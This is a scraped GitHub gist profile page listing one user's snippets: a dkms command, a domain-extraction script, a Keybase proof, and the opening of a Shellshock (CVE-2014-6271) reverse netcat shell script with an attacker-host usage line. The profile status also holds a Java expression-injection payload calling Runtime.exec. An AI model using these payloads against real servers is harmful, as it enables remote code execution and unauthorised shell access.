Skip to content

Instantly share code, notes, and snippets.

View schniggie's full-sized avatar
💣
/${@𝚓𝚊𝚟𝚊.𝚕𝚊𝚗𝚐.𝚁𝚞𝚗𝚝𝚒𝚖𝚎@𝚐𝚎𝚝𝚁𝚞𝚗𝚝𝚒𝚖𝚎().𝚎𝚡𝚎𝚌("𝚆𝚃𝙵 𝙰𝚝𝚕𝚊𝚜𝚜𝚒𝚊𝚗")}/

ᄃΉЯIƧƬӨPΉΣЯ (BᄂΣᄃKMΛПП-)DЯΣΉΣЯ schniggie

💣
/${@𝚓𝚊𝚟𝚊.𝚕𝚊𝚗𝚐.𝚁𝚞𝚗𝚝𝚒𝚖𝚎@𝚐𝚎𝚝𝚁𝚞𝚗𝚝𝚒𝚖𝚎().𝚎𝚡𝚎𝚌("𝚆𝚃𝙵 𝙰𝚝𝚕𝚊𝚜𝚜𝚒𝚊𝚗")}/
View GitHub Profile
Here goes.
ls /usr/src/linux-headers-* -d | sed -e 's/.*linux-headers-//' | \
sort -V | tac | sudo xargs -n1 /usr/lib/dkms/dkms_autoinstaller start
Run as root.
@schniggie
schniggie / getDomains.py
Created October 31, 2019 08:24
Get Domain+TLD from list of URLs with or without protocol handler
!/usr/bin/env python3
import sys
import os
import tld
from tld import get_fld
def main():
filepath = sys.argv[1]
@schniggie
schniggie / keybase.md
Created January 5, 2015 22:07
keybase.md

Keybase proof

I hereby claim:

  • I am schniggie on github.
  • I am schniggie (https://keybase.io/schniggie) on keybase.
  • I have a public key whose fingerprint is 5160 DDC6 CDCF 625E 38DE 3988 2678 535E 3F18 708A

To claim this, I am signing this object:

@schniggie
schniggie / CVE-2014-6271_netcat_reverse.py
Created September 25, 2014 08:19
CVE-2014-6271 cgi-bin reverse netcat shell
#
#CVE-2014-6271 cgi-bin reverse shell
#Use netcat -l -p 8080 to receive the reverse shell
#
import httplib,urllib,sys
if (len(sys.argv)<4):
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
print "Example: %s localhost /cgi-bin/test.cgi '10.0.0.1 8080'" % sys.argv[0]